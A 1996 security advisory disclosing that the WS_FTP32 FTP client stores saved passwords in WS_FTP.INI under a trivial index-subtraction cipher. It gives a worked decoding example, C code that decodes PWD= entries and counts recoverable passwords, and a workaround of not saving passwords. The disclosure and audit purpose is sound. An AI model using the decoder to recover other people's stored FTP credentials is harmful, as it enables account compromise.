WS_FTP Password Encryption Defeated!
This document explains how to defeat WS_FTP32 client-side password encryption and gives a temporary solution to the problem. The ease with which this encryption scheme can be defeated is very alarming, since the majority of Windows users on the Internet use WS_FTP32 as their main ftp client. Defeating the encryption routine takes only a few lines of C code.

I would like to thank Nightshd and Yoshi for bringing up this topic and assisting in defeating it!

No disassemblies or viewing of the source was performed.

If you have questions or concerns about this weakness, please contact its author, John A. Junod, or contact him at his alternative site.


Disclaimer

As always, Damaged Cybernetics promotes the usage of its documents for educational purposes only. If you feel you have an issue concerning our information distribution, please contact us.


How serious is this?

  • People running a variant of Windows are affected. Windows NT is an exception, since it can be secure if configured properly. However, this does NOT fix the problem!
  • Home users, government agencies and corporations use this as their main ftp client. Home users are generally excluded unless you have very nasty friends. Government agencies and businesses are more at risk, since Windows is not a very secure operating system.


Password Details

  • Passwords are a maximum of 78 characters.
  • Passwords can contain letters, numbers and high end ASCII (MS-DOS) characters. Most users only use letters and numbers in their passwords.
  • Password lengths are always divisible by 2.
  • Once encrypted, passwords are stored as a hex string in an INI file called WS_FTP.INI. It is located either in the Windows home directory or in the WS_FTP home directory.

    Example:
    [Test System]
    HOST=0
    UID=MindRape
    PWD=6162636465
    PASVMODE=0

  • Two 1-digit hex values make up one ASCII character. For example, the hex string '69626A' breaks down as (69)(62)(6A), which is 3 characters.
  • The hex string is stored as a C style string. Its index starts at 0.


Defeating It

The password encryption is fairly simple; it closely resembles a Caesar cipher.

For every two 1-digit hex values, concatenate them to produce one hex value. Then take its index (C style) in the string and subtract it from the hex value. This produces the correct ASCII value.

Example:
Let's take the password '48666E6F73255D767A756E2C' (from WS_FTP.INI) and try to decrypt it.

First, break the string down into its true hex values.
(48)(66)(6E)(6F)(73)(25)(5D)(76)(7A)(75)(6E)(2C)

Since this is a C style string, its index starts at 0. Let's decode the password now.

(0x48)-0 = 48 = H
(0x66)-1 = 65 = e
(0x6E)-2 = 6C = l
(0x6F)-3 = 6C = l
...

Eventually it produces the string 'Hello World!'.

Here is some C source code to do it for you.
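
The original source file is not reproduced on this page. The following C is an added example, not the authors' code: it applies the index subtraction described above with input validation, and adds an audit helper that counts how many PWD= entries in a WS_FTP.INI hold a recoverable saved password. The names wsftp_decode, count_recoverable and PW_BUF are hypothetical.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>
#define PW_BUF 79 /* page gives a 78-character maximum; assumed to be the decoded length */

/* Value of one hex digit, or -1 if c is not a hex digit. */
static int hexval(int c) {
    if (isdigit(c)) return c - '0';
    c = toupper(c);
    return (c >= 'A' && c <= 'F') ? c - 'A' + 10 : -1;
}

/* Decode a PWD= value: each hex pair minus its zero-based pair index. Returns the length,
 * or -1 if malformed (odd length, non-hex digit, output too small, byte below its index). */
int wsftp_decode(const char *hex, char *out, size_t outsz) {
    size_t n = strlen(hex), i;
    if (n % 2 != 0 || n / 2 + 1 > outsz) return -1;
    for (i = 0; i < n / 2; i++) {
        int hi = hexval((unsigned char)hex[2 * i]);
        int lo = hexval((unsigned char)hex[2 * i + 1]);
        int v = hi * 16 + lo - (int)i;
        if (hi < 0 || lo < 0 || v < 0) return -1;
        out[i] = (char)v;
    }
    out[i] = '\0';
    return (int)i;
}

/* Audit helper: count PWD= lines in INI text that hold a recoverable saved password. */
int count_recoverable(const char *ini) {
    char line[256], pw[PW_BUF];
    int count = 0;
    while (*ini) {
        size_t len = strcspn(ini, "\r\n");
        size_t copy = len < sizeof line - 1 ? len : sizeof line - 1;
        memcpy(line, ini, copy);
        line[copy] = '\0';
        if (strncmp(line, "PWD=", 4) == 0 && wsftp_decode(line + 4, pw, sizeof pw) > 0)
            count++;
        ini += len + strspn(ini + len, "\r\n");
    }
    return count;
}

int main(void) { /* decode the page's own example string */
    char pw[PW_BUF];
    if (wsftp_decode("48666E6F73255D767A756E2C", pw, sizeof pw) > 0) puts(pw);
    return 0;
}
```

A non-zero count from count_recoverable means the file should be treated as holding plaintext credentials: clear the saved passwords and change them on the servers concerned.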


Work Around

The recommended workaround is not to use the Save Password feature of WS_FTP32. This is generally a good idea across all secured applications. Unless both the password encryption scheme and its implementation have been publicly reviewed, one should NEVER trust a feature such as this.

Damaged Cybernetics is not connected or affiliated with any mentioned company in any way. The opinions of Damaged Cybernetics do not reflect the views of the various companies mentioned here. Companies and all products pertaining to that company are trademarks of that company. Please contact that company for trademark and copyright information.

© 1996 Damaged Cybernetics All Rights Reserved